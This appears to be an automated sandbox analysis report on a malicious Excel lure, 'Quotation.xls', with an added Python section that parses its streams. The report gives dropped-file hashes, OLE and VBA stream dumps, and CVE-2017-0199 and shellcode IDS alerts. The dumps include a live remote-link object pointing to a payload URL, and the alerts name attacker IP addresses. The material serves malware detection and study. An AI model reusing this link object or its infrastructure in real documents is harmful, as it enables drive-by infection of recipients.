                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3072
                Entropy (8bit):2.820054014397794
                Encrypted:false
                SSDEEP:24:etGSGJ2J2F8y7vUWukDqZCa0l5qHRDtkZfCqaMYOC+WI+ycuZhNTakS1PNnqI:6tUecVICl5qxiJCqljCl1ulTa3vqI
                MD5:1F63542B415DB2C9BB2893A1B6174052
                SHA1:DC3DA7A0D7BF003C374B52F764B3D946CB061A4C
                SHA-256:7A23CC15316AFB9ACDCDF87479C0ADE7A04C1CD4736F1EB2C29C726568391756
                SHA-512:C4B1AF5998404609762A0D27E2B6D8F0FC890FD97617BABFCBD7A7EFFAD7A4372ADF22306B095ABE9E4D85195B666A2FDF61FC37F806AA01ADB9F79C0BC7E3E6
                Malicious:true
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                Category:modified
                Size (bytes):866
                Entropy (8bit):5.359652144899971
                Encrypted:false
                SSDEEP:24:AId3ka6KzNpEoNwKaMD5DqBVKVrdFAMBJTH:Akka60zEoOKdDcVKdBJj
                MD5:8ECCB2F2918C6354F9E8E9CF10133713
                SHA1:FBCB71E2C64F65577E9E9DAD6A313716B66E06F6
                SHA-256:2F424116F9E6A620579DBA36EF86D98E1955454919223D1A5E9423A5B5CF5744
                SHA-512:FD63A46B841463854A0D49941AC64731648B5716D05CBA12D919FEEBA16D8AE9117AE7E4EB8C7BAE0BDFADB58F784F9D38366D553B7202E60BF214489AFFAA60
                Malicious:false
                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):556032
                Entropy (8bit):7.930543297900913
                Encrypted:false
                SSDEEP:6144:lJ1+Jt748yJUItitCxf/yiwnmEKIsVCRzsvQ+GqNSQjt4ZEs0aOxH6EbFNKjZH4K:TcJ2vXtiyHpFV8kZhUEj7LKNYNgbFG+
                MD5:3E86E8EFDBE82661247721B516F756E5
                SHA1:EE9CC83387AD9838FE15FAA46598625E9440485E
                SHA-256:9FC5609538C5847DB08D08D3404922669C2F3CB2091F1FBE1D77FA1E07D4E8DB
                SHA-512:6FE3996294FA93E156B09ED6B861AD4A644E1F4190E0473D1C2327E5768C0584D0D017D32ACBB399F85945300B000459DFC163A71E1107A934B7055B56B7C925
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):561152
                Entropy (8bit):7.875508766138141
                Encrypted:false
                SSDEEP:6144:w1+Jt748yJUItitCxf/yiwnmEKIsVCRzsvQ+GqNSQjt4ZEs0aOxH6EbFNKjZH4Ns:wcJ2vXtiyHpFV8kZhUEj7LKNYNgbFG+
                MD5:BDC59C8B85284CB08A55D70FC7957E52
                SHA1:224E36D398C00AE4D1B6A4D4C7D608B1CDDACED0
                SHA-256:0AFD7E20709AD6762B08A391951D7C13AF65F2F281D7D1CD16879DE3C94C1C59
                SHA-512:40F73581AFA2A459CC0F34931ACABD02BB9C4907C2F693267C2EF43893A9C2CE32046B2DCDB9524756A296592C9F8EC03EDB56C764CC9C3972AA52701D69A0BF
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):2673152
                Entropy (8bit):7.219441527091625
                Encrypted:false
                SSDEEP:49152:Og7eO7kjTav5AwVZGsY3uS+s1vm1lvt+vU0JSziMwqM:j7lmmUM7wq
                MD5:4FB3E6E7B8F9C12CD2D5E161F7B94760
                SHA1:57BDAD62C6EA7F1B905C900302F918D185811A94
                SHA-256:F76F9B85DF2BA8850BEC058164D2C752C8FD8EF0F1BCFFD793E5F453D8A839BB
                SHA-512:F762AD1CCD537D06C1CF3538E433671F441F100B06D37EC34B3A3E76DFBFAD40AC7CA50EE32297C54F628B0B89D75C2C5255166CC992F9BCFF8F117F70AA179A
                Malicious:true
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 08:30:16 2024, Security: 1
                Category:dropped
                Size (bytes):1099264
                Entropy (8bit):7.981750201333905
                Encrypted:false
                SSDEEP:24576:P29iKjVBuNCgZGCTsW8wtwc4DFrLdDa4r:+UKjVBuNFT582wcsvVa4
                MD5:B94631477A7949939C13CA1B9E61FB62
                SHA1:6C708AB62656882E849199C13F708E6BE403AA31
                SHA-256:7B923F157A961FA88B8E59C810B11DC56985912FB1087C3350268B1DE985DE86
                SHA-512:7586EEAEEBE17A5C17C8A6CE4E394DDD4043803E1E5879DE547CE05B9106B4C50D5876A1EB5CFFD9AB8F98BA70C6F3F2DE1B96EA272498174E1E874A3DA34A86
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 08:30:16 2024, Security: 1
                Category:dropped
                Size (bytes):1099264
                Entropy (8bit):7.981750201333905
                Encrypted:false
                SSDEEP:24576:P29iKjVBuNCgZGCTsW8wtwc4DFrLdDa4r:+UKjVBuNFT582wcsvVa4
                MD5:B94631477A7949939C13CA1B9E61FB62
                SHA1:6C708AB62656882E849199C13F708E6BE403AA31
                SHA-256:7B923F157A961FA88B8E59C810B11DC56985912FB1087C3350268B1DE985DE86
                SHA-512:7586EEAEEBE17A5C17C8A6CE4E394DDD4043803E1E5879DE547CE05B9106B4C50D5876A1EB5CFFD9AB8F98BA70C6F3F2DE1B96EA272498174E1E874A3DA34A86
                Malicious:true
                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jul 25 17:59:41 2024, Security: 1
                Entropy (8bit):7.9786557114017915
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:Quotation.xls
                File size:1'129'472 bytes
                MD5:36cace5745dcb32c2ab03ca4ba433394
                SHA1:2e479ac4ea9b158f39093dded3b55c360a1f2082
                SHA256:c2f6ea297ebee1570036db204177fde0e0263006637806e9b28365bb4ef14d7c
                SHA512:e2dd193741bb1f9afc3a954bba2ee75a4df1797a487366ad8577a23366f87cb946957f258ab5b493b15abcf351da294e1bca8780765c855ad9a72aed4ed058af
                SSDEEP:24576:d29iKjVBuNCgP4G2ycKiEb+S81doGvdKLQy2H7T1:0UKjVBuND4G2ciEb+SNIdOh
                TLSH:3D3523A1BE714B4AEA0A84395DF4EE92267D7C665470E8133A307B2E543577523C33EC
                Icon Hash:276ea3a6a6b7bfbf
                Document Type:OLE
                Number of OLE Files:1
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2024-07-25 16:59:41
                Creating Application:Microsoft Excel
                Security:1
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Attribute VB_Name = "Sheet2"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                VBA File Name:Sheet3.cls
                Stream Size:977
                Attribute VB_Name = "Sheet3"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.3020681057018666
                Base64 Encoded:False
                General
                Stream Path:MBD00034653/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD00034653/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:557009
                Entropy:7.972393889771479
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD00034654/\x1Ole
                CLSID:
                File Type:data
                Stream Size:338
                Entropy:6.411144727611267
                Base64 Encoded:False
                Data ASCII:. . . . 7 y . U G . / . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . j . j . J . s . P . X . . . 0 . ? ! A . . 1 I . . 9 . . i . B l . | 3 ) [ L K i . w b 6 1 . j u . . U ; " : = . . . _ k J 5 J 5 . g 1 d e D ? t V . o U ~ w h . . G 3 2 . . . [ . . s ~ . . . $ a . u . - S . \\ , . . . . . . . . . . . . . . . . . . . . L . X . e . h . p . 8 . t . N . X . 2 . . . u . p ! z ( ^ ` . Y C d T . .
                Data Raw:01 00 00 02 37 79 0d 55 47 04 f6 2f 00 00 00 00 00 00 00 00 00 00 00 00 dc 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b d8 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 6a 00 6a 00 4a 00 73 00 50 00 58 00 00 00 30 07 3f db d3 fe b2 bd 21 41 16 14 31 49 1f 94 ab 16 39 15 06 69 be d4 d7 08 42 af fc ff c9 6c ee dc 0d f2
                General
                Stream Path:Workbook
                CLSID:
File Type:data (libmagic reports "Applesoft BASIC program data, first line number 16", which is a misidentification: the stream opens with 09 08 10 00 00 06 05 00, i.e. a BIFF BOF record, type 0x0809, length 0x0010, version 0x0600 = BIFF8, substream type 0x0005 = workbook globals, so this is an ordinary Excel 97-2003 Workbook stream)
                Stream Size:549837
                Entropy:7.999325247179491
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . l L v 9 . I 3 c I C A D q _ . r j . # . $ > A . [ E . . . . . . . . . . ] . . . \\ . p . . i % . ] . . v o P b . . y : ' I . z . . 5 . . t v 5 . ; . " | ' F . e . < . 4 . . . w . w . . . = 2 K B . . . o a . . . y . . . = . . . . | . . . a ~ x 1 n H . . . . . . . = L . . . . . . . . w . . . . . . . = . . . ` 4 . . . . . h L @ . . . . . . . j - " . . . # . . . . w . . . . . . . 1 . . . . 9 a 7 c . . Z . ) C 1 . . . . . o . * D m h . . . V V _ 1 . . . {
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 96 9d a0 6c 94 fa 98 4c 76 39 17 49 33 80 a7 63 49 43 41 44 71 5f 0b ec 72 6a a7 07 23 01 24 3e d8 41 17 5b e5 45 7f ff b7 c9 f1 07 11 fc bd ce e1 00 02 00 b0 04 c1 00 02 00 5d b5 e2 00 00 00 5c 00 70 00 e5 1f a7 69 25 7f a3 a3 fd 5d eb b7 0c 12 fe 84 76 6f 50 a7 eb b2 62 c2 d1 ab 10 79 3a 27
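Two of the streams listed above deserve a closer look than the report's hex dump gives them: the MBD00034654/\x1Ole stream, whose Data Raw carries a URL moniker CLSID followed by a UTF-16 "http://tny.wtf/jjJsPX" string (the remote-link object pattern behind CVE-2017-0199), and the Workbook stream, whose leading bytes libmagic mislabels. The following Python is an added example written for this page, not Joe Sandbox code: it parses the MS-OLEDS OLEStream layout to recover the link target and decodes the BIFF BOF record. The sample bytes are copied from the two Data Raw fields above; the report truncates both dumps at 128 bytes, so the parser has to tolerate a stream that is shorter than its own length fields claim.

```python
import struct
import uuid

# Constructed sample: the first 128 bytes of MBD00034654/\x01Ole, copied from the
# report's "Data Raw" field. The stream is 338 bytes long; the dump is truncated.
OLE_STREAM_HEAD = bytes.fromhex(
    "01 00 00 02 37 79 0d 55 47 04 f6 2f 00 00 00 00 00 00 00 00 00 00 00 00 "
    "dc 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b d8 00 00 00 "
    "68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 "
    "74 00 66 00 2f 00 6a 00 6a 00 4a 00 73 00 50 00 58 00 00 00 30 07 3f db "
    "d3 fe b2 bd 21 41 16 14 31 49 1f 94 ab 16 39 15 06 69 be d4 d7 08 42 af "
    "fc ff c9 6c ee dc 0d f2"
)
# Constructed sample: the first 20 bytes of the Workbook stream, from its "Data Raw".
WORKBOOK_HEAD = bytes.fromhex("09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00")

URL_MONIKER_CLSID = uuid.UUID("79eac9e0-baf9-11ce-8c82-00aa004ba90b")


def _utf16z(buf):
    """Decode a NUL-terminated UTF-16LE string; report whether the terminator was found."""
    for i in range(0, len(buf) - 1, 2):
        if buf[i] == 0 and buf[i + 1] == 0:
            return buf[:i].decode("utf-16-le"), True
    return buf[: len(buf) & ~1].decode("utf-16-le", "replace"), False


def parse_moniker(stream):
    """Decode the moniker at the start of a moniker stream: a CLSID, then CLSID-specific data."""
    if len(stream) < 16:
        return None
    clsid = uuid.UUID(bytes_le=stream[:16])
    info = {"clsid": str(clsid), "kind": "unknown"}
    if clsid == URL_MONIKER_CLSID and len(stream) >= 20:
        # URLMoniker: a 4-byte Length, then the URL as a NUL-terminated UTF-16LE string.
        info["kind"] = "url"
        info["declared_length"] = struct.unpack_from("<I", stream, 16)[0]
        info["target"], info["terminated"] = _utf16z(stream[20:])
    return info


def parse_ole_stream(data):
    """Parse an MS-OLEDS OLEStream (the \\x01Ole stream of an OLE object).

    Layout: Version, Flags, LinkUpdateOption, Reserved1 (four uint32), then three
    length-prefixed moniker streams: reserved, relative source, absolute source.
    """
    if len(data) < 28:
        raise ValueError("OLEStream shorter than its fixed header")
    version, flags, _link_update, _reserved = struct.unpack_from("<4I", data, 0)
    if version != 0x02000001:
        raise ValueError(f"unexpected OLEStream version 0x{version:08x}")
    result = {
        "flags": flags,
        "linked": bool(flags & 1),
        # Only bit 0 (linked vs. embedded) carries meaning; Office ignores the rest,
        # so a hand-built stream can leave junk in the other bits without breaking.
        "flags_have_junk_bits": bool(flags & ~0x1),
        "truncated": False,
    }
    off, monikers = 16, {}
    for name in ("reserved", "relative", "absolute"):
        if off + 4 > len(data):
            result["truncated"] = True
            break
        size = struct.unpack_from("<I", data, off)[0]
        off += 4
        if off + size > len(data):
            result["truncated"] = True  # length field points past the bytes we have
        monikers[name] = data[off:off + size]
        result[f"{name}_moniker_declared_size"] = size
        off += size
    absolute = monikers.get("absolute", b"")
    result["moniker"] = parse_moniker(absolute) if absolute else None
    return result


def is_remote_link(parsed):
    """True when the absolute moniker is an http(s) URL: the object is fetched from the
    network as the document renders, which is the CVE-2017-0199 delivery pattern."""
    m = parsed.get("moniker") or {}
    target = m.get("target", "").lower()
    return m.get("kind") == "url" and target.startswith(("http://", "https://"))


BOF_SUBSTREAM_TYPES = {0x0005: "workbook globals", 0x0006: "Visual Basic module",
                       0x0010: "worksheet or dialog sheet", 0x0020: "chart sheet",
                       0x0040: "macro sheet", 0x0100: "workspace file"}


def parse_biff_bof(data):
    """Decode the BIFF BOF record that every Excel 97-2003 Workbook stream starts with."""
    rec_type, rec_len = struct.unpack_from("<HH", data, 0)
    if rec_type != 0x0809:
        raise ValueError(f"not a BOF record: 0x{rec_type:04x}")
    vers, dt, rup_build, rup_year = struct.unpack_from("<HHHH", data, 4)
    return {"record_length": rec_len, "biff_version": vers,
            "substream": BOF_SUBSTREAM_TYPES.get(dt, f"unknown (0x{dt:04x})"),
            "rupBuild": rup_build, "rupYear": rup_year}


if __name__ == "__main__":
    ole = parse_ole_stream(OLE_STREAM_HEAD)
    print(ole["moniker"]["target"], "remote link:", is_remote_link(ole), "flags:", hex(ole["flags"]))
    print(parse_biff_bof(WORKBOOK_HEAD))
```

On this sample the parser recovers the target from the absolute-source moniker, flags the stream as truncated (the moniker stream claims 220 bytes but only 100 are in the dump), and notes that the Flags field holds 0x550d7937 rather than a plain 0 or 1; the bit-0 "linked" flag is nevertheless set. Run the same code over the full 338-byte stream pulled out with olefile to see the remaining bytes past the URL.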
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:523
                Entropy:5.242959383129243
                Base64 Encoded:True
                Data ASCII:I D = " { 4 9 6 7 3 D F A - E C 5 0 - 4 F D 1 - B 6 7 0 - C F 2 7 1 8 8 A 2 0 1 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 7 6 7 E 7 A 7 E 7 A 7 E 7
                Data Raw:49 44 3d 22 7b 34 39 36 37 33 44 46 41 2d 45 43 35 30 2d 34 46 44 31 2d 42 36 37 30 2d 43 46 32 37 31 38 38 41 32 30 31 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2644
                Entropy:3.9991265979317787
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:553
                Entropy:6.381128031743399
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . z h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 cb 7a b3 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T09:29:59.517525+0200 | TCP | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 49166 | 80 | 192.168.2.22 | 91.92.245.100
2024-07-26T09:30:09.356706+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
2024-07-26T09:30:09.273433+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
